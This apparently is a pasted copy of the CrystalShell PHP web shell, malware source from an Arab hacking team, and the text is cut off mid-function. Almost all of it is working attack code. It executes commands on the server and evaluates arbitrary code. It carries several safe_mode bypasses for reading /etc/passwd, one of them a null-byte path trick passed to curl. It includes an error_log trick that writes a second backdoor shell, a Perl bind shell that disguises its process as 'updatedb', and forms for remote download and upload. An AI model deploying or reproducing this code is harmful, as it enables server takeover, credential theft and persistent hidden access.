

Jun 30th, 2016
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  2. <?
  7. error_reporting(5);
  8. @ignore_user_abort(true);
  9. @set_magic_quotes_runtime(0);
  10. $win = strtolower(substr(PHP_OS, 0, 3)) == "win";
  11. /**********************************************************/
  12. /* CrystalShell v.1
  13. /* --------- ----------
  14. /*
  15. /* Coded by : Super-Crystal and Mohajer22
  16. /* ------------------------------------------------
  17. /* Arab Security Center Team <---thanks
  18. /* mail : sup3r-hackers@hotmail.Com
  19. /* october73 shell & CrystalShell < coding by super crystal
  20. /*
  21. /*********************************************************/
  22. ?>
  23. <?$dir=realpath("./")."/";
  24. $dir=str_replace("\\","/",$dir);
  25. ?>
  27. <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
  28. Crystal shell</title>
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  64. <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
  65. <p align="center">&nbsp;</p>
  66. <p align="center">
  67. <a bookmark="minipanel">
  68. <font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
  69. <font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span>&nbsp;&nbsp;&nbsp;&nbsp; </font>
  70. <font color="#FFFF00" face="Arial" size="7"><span lang="en-us">0.2</span></font></p>
  71. </p>
  72. <a bookmark="minipanel">
  73. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  74. <p align="center">
  75. <b>
  76. <?
  77. $dirfile="$file_to_download";
  78. if (file_exists("$dirfile"))
  79. {
  80. header("location: $dirfile");
  81. }
  82. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
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  84. $safemode = true;
  85. $hsafemode = "<font color=\"red\">ON (secure)</font>";
  88. }
  90. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  91. echo("Safe-mode: $hsafemode");
  92. // PHPINFO
  93. if ($_GET['action'] == "phpinfo") {
  94. echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
  95. exit;
  96. }
  97. $v = @ini_get("open_basedir");
  98. if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
  99. else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
  100. echo("<br>");
  101. echo("Open base dir: $hopenbasedir");
  102. echo("<br>");
  103. echo "PostgreSQL: <b>";
  104. $pg_on = @function_exists('pg_connect');
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  106. echo("<br>");
  107. echo "MSSQL: <b>";
  108. $mssql_on = @function_exists('mssql_connect');
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  110. echo("<br>");
  111. echo "MySQL: <b>";
  112. $mysql_on = @function_exists('mysql_connect');
  113. if($mysql_on){
  114. echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
  115. echo("<br>");
  116. echo "PHP version: <b>".@phpversion()."</b>";
  117. echo("<br>");
  118. echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
  120. echo("<br>");
  121. echo "Disable functions : <b>";
  122. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
  123. $free = @diskfreespace($dir);
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  126. if (!$all) {$all = 0;}
  127. $used = $all-$free;
  128. $used_percent = @round(100/($all/$free),2);
  130. ?>
  131. </b></p>
  132. <p align="center">&nbsp;</p></td></tr></table>
  133. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  134. <b>
  135. </b></p>
  136. <p align="center">&nbsp;</p></td></tr></table>
  138. </a>
  142. </p>
  143. <p align="center"><font color="#FFFF00">&nbsp;</font></p>
  144. <p align="center"></p>
  145. </th></tr><tr>
  146. <td bgcolor="#000000" style="color: #DCE7EF">
  147. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  148. <font size="4px">
  149. <b>
  150. <font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
  151. <font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
  152. </font>
  153. </p>
  154. </font>
  155. <font size=1 face=Verdana>
  156. <p align="left"><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
  157. </b>
  158. </font>
  159. </font>
  160. <a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
  161. <font size=-2 face=verdana color="#FFFFFF">
  162. <? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
  163. </font>
  164. </a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
  165. <? echo getcwd();?></div></font></font></a></font></b></a></font><br>
  167. <br>&nbsp;<b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px"><font color="#FF0000" face="Verdana" size="-2">
  168. </font></font><font color="#FF0000" face="Verdana" size="2">
  169. &nbsp;</font></a><font size=2 face=verdana></a></font><font face="Verdana" size="2">&nbsp;</font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="1" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
  171. </font></a><font face="Wingdings" size="1" color="#C0C0C0">ð</font><span lang="en-us"><font size="1" color="#C0C0C0" face="Webdings">
  172. </font></span><font face=Verdana color="white"><font color="#CC0000" size="1"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font><font size="1"></a></font></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="1">2</font></span><b><font size=1 face=verdana>
  173. </font>
  174. <font size="4px" face="verdana" color="white">
  175. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  176. <font color=#DCE7EF face="Verdana" size="1">&nbsp;</font></font><font face="verdana" color="white"><span lang="en-us"><a title="ÇáÃÏæÇÊ" href="?act=tools"><font color=#CC0000 size="1">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="1">4</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
  177. </font>
  178. <font size="4px" face="verdana" color="white">
  179. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  180. <font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font></font>
  181. <font face="verdana" color="white"><span lang="en-us">
  182. <a title="ÇáÊÔÝíÑ" href="?act=decoder"><font color=#CC0000 size="1">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="1">i</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
  183. </font>
  184. <font size="4px" face="verdana" color="white">
  185. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  186. <font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font>
  187. </font><span lang="en-us"><font face="verdana" color="white">
  188. <font color=#CC0000 size="1">
  189. <a title="ËÛÑÇÊ ÇáãÑæÑ" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font><font size="1"></a></font></font><font face="Webdings" size="1" color="#C0C0C0">`</font></span><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
  190. </font>
  191. <font size="4px" face="verdana" color="white">
  192. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  193. <font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font>
  194. </font><font face="verdana" color="white"><span lang="en-us">
  195. <a title="ÇáÅÊÕÇá ÈÞÇÚÏÉ ÇáÈíÇäÇÊ" href="?act=SQL"><font color=#CC0000 size="1">SQL</font></a></span></font></b><font face="Webdings" size="1" color="#C0C0C0">Â</font><b><font size="1" face="verdana" color="white"></a></font></b><font size="1"></font></font><b><font size=1 face=verdana>
  196. </font></b><font size="4px"><b>
  197. <font size="4px" face="verdana" color="white">
  198. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  199. <font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="1">Bind</font></a></font></span></b><font face="Webdings" size="1" color="#C0C0C0">Â</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="1"> </font>
  200. </font></b></font><font face="verdana" color="white">
  201. <b>
  202. <span lang="en-us"><font color=#CC0000 size="1">
  203. <a title="ÇáãÓÇÚÏÉ" href="?act=help"><font color="#CC0000">help</font></a></font></span><font size="1"></a></font></b></font><b><font size="1"></a></font><font size=1 face=verdana>
  204. </font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="1">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="1"><a title="ÇÞÑÇÁäí" href="?act=about"><font color="#CC0000">about</font></a></font></span><font size="1"></a></font></font><font size="1"></a></font><font size=1 face=verdana>
  205. </font></b><span lang="en-us"><font size=1 face=Wingdings color="#C0C0C0">
  206. ?</font></span></p>
  207. <p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
  208. [</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
  210. <font size="4px">
  211. <font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  212. <font size=-2 face=verdana color=#CC0000>server </font>
  213. <font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
  214. </font></a></font>
  215. </a></font>
  216. </font><b>
  217. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  218. <font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
  219. <font size=-2 face=verdana color=white>
  220. <font size="4px" face="verdana" color="white">
  221. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  222. <font face=Verdana size=-2 color="#008000">
  223. CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
  224. <font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
  225. admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
  226. </font>
  227. </b>
  228. </font></a>&nbsp;&nbsp;<br>
  230. <font size="4px">
  231. <b>
  232. <font size=-2 face=verdana color=white>
  233. <font face=Verdana size=-2 color="#CC0000">
  234. <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
  235. <font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
  236. </font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
  237. </font>
  238. </a>
  240. <font size="4px">
  241. </a>
  242. <font size=-2 face=verdana color=white>
  244. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  245. </font></font>
  246. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  247. <font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  248. </font>
  249. <font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
  250. port
  251. </font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
  252. </font></font>
  253. </font>
  254. </font>
  255. </b>
  256. </font></p></td></tr></table>
  257. <?
  258. if ($act == "help") {echo "<center><b>ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå<br><br>ÚÒíÒí ÇáãÓÊÎÏã<br>ÇÐÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑÞ<br>æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ </a>.</b>";}
  259. if ($act == "bindport"){
  260. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  261. <b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
  262. <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
  263. <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
  264. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  265. <INPUT type=\"submit\" value=\"Connect\"></form></div>";
  266. }
  267. if ($act == "tools"){
  268. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  269. File to edit:
  270. <input type=\"text\" name=\"editfile\" >
  271. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  272. <INPUT type=\"submit\" value=\"Edit\"></form></div>";
  273. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  274. <table id=tb><tr><td>
  275. <INPUT type=\"hidden\" name=\"php\" value=\"yes\">
  276. <INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
  277. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  278. <table id=tb><tr><td>Download here <b>from</b>:
  279. <INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
  280. <b>-->>:</b>
  281. <INPUT type=\"text\" name=\"fileto\" size=30>
  282. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
  283. <INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
  284. }
  285. if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic </a>.</b>";}
  287. if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect Þã ÈÇáÖÛØ Úáì ÎíÇÑ.<br>.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ<br>.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì<br>nc -lp 3333ÈßÊÇÈÉ ÇáãäÝÐ - <br>ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá <br>Bind port to :<br> bind shell æåäíÆÇ ð áß </a>.</b>";}
  289. if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå Select ------ x ÇÖÛØ Úáì ÇáÎíÇÑ<br>.- æÇÐÇ ÇÑÏÊ ßÊÇÈå ÇáÇæÇãÑ ÈäÝÓß ÞÏ ÊßÊÝí ÈÇáÎíÇÑ<br>Command </a>.</b>";}
  291. if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks </a>.</b>";}
  292. if (array_key_exists('image', $_GET)) {
  293. header('Content-Type: image/gif');
  294. die(getimage($_GET['image']));
  295. }
  297. if ($act == "bypass") {
  298. echo "
  299. <form action=\"$REQUEST_URI\" method=\"POST\">
  300. <table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
  301. ";
  302. echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
  303. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  304. <table id=tb><tr><td>read file :
  305. <INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
  306. <INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
  307. echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
  308. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  309. <table id=tb><tr><td>read file :
  310. <INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
  311. <INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
  312. echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
  313. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  314. <table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
  315. <INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
  316. <INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
  317. echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
  318. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  319. <table id=tb><tr><td>
  320. <select name=plugin><option>cat /etc/passwd</option></select>
  321. <INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
  322. echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
  323. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  324. <table id=tb><tr><td>
  325. <INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
  326. <INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
  327. }
  328. if ($act == "decoder"){
  329. echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
  330. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  331. <table id=tb><tr><td>
  332. <textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
  333. </textarea><br>
  334. <INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
  335. }
  336. if ($act == "SQL"){
  337. echo ("<FONT COLOR=\"RED\"> MySQL </FONT>");
  338. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  339. <table id=tb><tr><td> Username :
  340. <INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
  341. password :
  342. <INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
  343. <input type=submit value='Enter'>\n
  344. <input type=reset value='Clear'></td></tr></table></form></div>";
  345. }
  346. ?>
  350. <br>
  351. <TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
  352. <td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
  353. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  354. <TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
  355. <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
  356. <td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
  357. &nbsp;</p>
  358. <p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
  359. <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
  360. <td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
  361. <?php
  362. // chr() //
  363. if(empty($_POST['Mohajer22'])){
  364. } else {
  365. $m=$_POST['Mohajer22'];
  366. $m=str_replace(" ","",$m);
  367. $m=str_replace("(","",$m);
  368. $m=str_replace(")","",$m);
  369. $m=str_replace(".",";",$m);
  370. $m=str_replace("chr","&#",$m);
  371. $m=str_replace(" ","",$m);
  372. echo $m ;
  373. }
  374. // ERORR //
  375. if(empty($_POST['ERORR'])){
  376. } else {
  377. $ERORR=$_POST['ERORR'];
  378. echo error_log("
  379. <html>
  380. <head>
  381. <title> Exploit: error_log() By * Super-Crystal * </title>
  382. <body bgcolor=\"#000000\">
  383. <table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
  384. <tr>
  385. <td><center><font size='6' color='#BBB516'> By * Super-Crystal * TrYaG Team</font></center></td>
  386. </tr>
  387. </table>
  388. <font color='#FF0000'>
  389. </head>
  390. <?
  391. if(\$fileup == \"\"){
  392. ECHO \" reade for up \";
  393. }else{
  394. \$path= exec(\"pwd\");
  395. \$path .= \"/\$fileup_name\";
  396. \$CopyFile = copy(\$fileup,\"\$path\");
  397. if(\$CopyFile){
  398. echo \" up ok \";
  399. }else{
  400. echo \" no up \";
  401. }
  402. }
  403. if(empty(\$_POST['m'])){
  404. } else {
  405. \$m=\$_POST['m'];
  406. echo system(\$m);
  407. }
  408. if(empty(\$_POST['cmd'])){
  409. } else {
  410. \$h= \$_POST['cmd'];
  411. print include(\$h) ;
  412. }
  415. ?>
  416. <form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
  417. <input type='file' name='fileup' size='20'>
  418. <input type='submit' value=' up '>
  419. </form>
  420. <form method='POST' action='Super-Crystal.php'>
  421. <input type='cmd' name='cmd' size='20'>
  422. <input type='submit' value=' open (shill.txt) '>
  423. </form>
  424. <form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
  425. <input type='text' name='m' size='20'>
  426. <input type='submit' value=' run '>
  427. <input type='reset' value=' reset '>
  428. </form>
  429. ", 3,$ERORR);
  430. }
  431. // id //
  432. if ($_POST['plugin'] ){
  435. switch($_POST['plugin']){
  436. case("cat /etc/passwd"):
  437. for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd
  438. $ara = posix_getpwuid($uid);
  439. if (!empty($ara)) {
  440. while (list ($key, $val) = each($ara)){
  441. print "$val:";
  442. }
  443. print "<br>";
  444. }
  445. }
  447. break;
  450. }
  451. }
  453. // imap //
  454. $string = !empty($_POST['string']) ? $_POST['string'] : 0;
  455. $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
  457. if ($string && $switch == "file") {
  458. $stream = imap_open($string, "", "");
  460. $str = imap_body($stream, 1);
  461. if (!empty($str))
  462. echo "<pre>".$str."</pre>";
  463. imap_close($stream);
  464. } elseif ($string && $switch == "dir") {
  465. $stream = imap_open("/etc/passwd", "", "");
  466. if ($stream == FALSE)
  467. die("Can't open imap stream");
  468. $string = explode("|",$string);
  469. if (count($string) > 1)
  470. $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
  471. else
  472. $dir_list = imap_list($stream, trim($string[0]), "*");
  473. echo "<pre>";
  474. for ($i = 0; $i < count($dir_list); $i++)
  475. echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
  476. echo "</pre>";
  477. imap_close($stream);
  478. }
  479. // CURL //
  480. if(empty($_POST['curl'])){
  481. } else {
  482. $m=$_POST['curl'];
  483. $ch =
  484. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  485. curl_exec($ch);
  486. var_dump(curl_exec($ch));
  487. }
  489. // copy//
  490. $u1p="";
  491. $tymczas="";
  492. if(empty($_POST['copy'])){
  493. } else {
  494. $u1p=$_POST['copy'];
  495. $temp=tempnam($tymczas, "cx");
  496. if(copy("compress.zlib://".$u1p, $temp)){
  497. $zrodlo = fopen($temp, "r");
  498. $tekst = fread($zrodlo, filesize($temp));
  499. fclose($zrodlo);
  500. echo "".htmlspecialchars($tekst)."";
  501. unlink($temp);
  502. } else {
  503. die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  504. <B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
  505. access.</CENTER></FONT>");
  506. }
  507. }
  509. @$dir = $_POST['dir'];
  510. $dir = stripslashes($dir);
  512. @$cmd = $_POST['cmd'];
  513. $cmd = stripslashes($cmd);
  515. $dires = '';
  516. $files = '';
  521. if (isset($_POST['port'])){
  522. $bind = "
  523. #!/usr/bin/perl
  525. \$port = {$_POST['port']};
  526. \$port = \$ARGV[0] if \$ARGV[0];
  527. exit if fork;
  528. $0 = \"updatedb\" . \" \" x100;
  529. \$SIG{CHLD} = 'IGNORE';
  530. use Socket;
  531. socket(S, PF_INET, SOCK_STREAM, 0);
  532. setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
  533. bind(S, sockaddr_in(\$port, INADDR_ANY));
  534. listen(S, 50);
  535. while(1)
  536. {
  537. accept(X, S);
  538. unless(fork)
  539. {
  540. open STDIN, \"<&X\";
  541. open STDOUT, \">&X\";
  542. open STDERR, \">&X\";
  543. close X;
  544. exec(\"/bin/sh\");
  545. }
  546. close X;
  547. }
  548. ";}
  550. function decode($buffer){
  552. return convert_cyr_string ($buffer, 'd', 'w');
  554. }
  558. function execute($com)
  559. {
  561. if (!empty($com))
  562. {
  563. if(function_exists('exec'))
  564. {
  565. exec($com,$arr);
  566. echo implode('
  567. ',$arr);
  568. }
  569. elseif(function_exists('shell_exec'))
  570. {
  571. echo shell_exec($com);
  574. }
  575. elseif(function_exists('system'))
  576. {
  578. echo system($com);
  579. }
  580. elseif(function_exists('passthru'))
  581. {
  583. echo passthru($com);
  585. }
  586. }
  588. }
  591. function perms($mode)
  592. {
  594. if( $mode & 0x1000 ) { $type='p'; }
  595. else if( $mode & 0x2000 ) { $type='c'; }
  596. else if( $mode & 0x4000 ) { $type='d'; }
  597. else if( $mode & 0x6000 ) { $type='b'; }
  598. else if( $mode & 0x8000 ) { $type='-'; }
  599. else if( $mode & 0xA000 ) { $type='l'; }
  600. else if( $mode & 0xC000 ) { $type='s'; }
  601. else $type='u';
  602. $owner["read"] = ($mode & 00400) ? 'r' : '-';
  603. $owner["write"] = ($mode & 00200) ? 'w' : '-';
  604. $owner["execute"] = ($mode & 00100) ? 'x' : '-';
  605. $group["read"] = ($mode & 00040) ? 'r' : '-';
  606. $group["write"] = ($mode & 00020) ? 'w' : '-';
  607. $group["execute"] = ($mode & 00010) ? 'x' : '-';
  608. $world["read"] = ($mode & 00004) ? 'r' : '-';
  609. $world["write"] = ($mode & 00002) ? 'w' : '-';
  610. $world["execute"] = ($mode & 00001) ? 'x' : '-';
  611. if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
  612. if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
  613. if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
  614. $s=sprintf("%1s", $type);
  615. $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
  616. $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
  617. $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  618. return trim($s);
  619. }
  626. if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
  627. {
